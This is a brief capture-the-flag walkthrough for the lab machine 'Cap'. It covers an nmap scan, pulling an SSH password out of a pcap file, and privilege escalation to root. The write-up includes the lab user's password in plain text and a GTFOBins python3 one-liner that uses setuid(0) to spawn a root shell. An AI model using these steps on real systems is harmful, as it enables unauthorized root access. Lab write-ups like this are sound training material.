CAP - Easy

1st Step :

nmap

nmap -sV -A 10.10.10.245 -vvv

2nd Step :

now using the port login in web as port is open , here you get the user name and now you go for pcap file and start changing the header value from 0

3rd Step :

now here ypu get pcap file and you examine it manually and you get the password for the user

4th Step :

now login in ssh using id pass

ssh nathan@cap 

Buck3tH4TF0RM3!

now you get the flag for user .

5th Step :

now for root user pass you have to check for active binaries . also from the name CAP YOU GET TO KNOW THAT THE EXPLOIT WILL PROBABLY LIE IN LINUX CAPABILITIES

Linux Capabilities - HackTricksHackTricks

getcap -r / 2>/dev/null

to search for the binaries

6th Step :

after this you will get to know a python3 binary is open

7th :

now you have to search exploit for the it so go on

https://gtfobins.github.io/

here you will get the exploit of python -

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

In this code you are using import OS to get exploit executed into the system .

setuid(0) to open into root user and then get into the shell /bin/sh

8th :

now type id and check you will get to know whether you are root and if you become root then get the flag

cat /root/root.txt

SHER BOLTE!!

PreviousSoulmate - Easy NextExpressway - Easy

Last updated 3 hours ago

Was this helpful?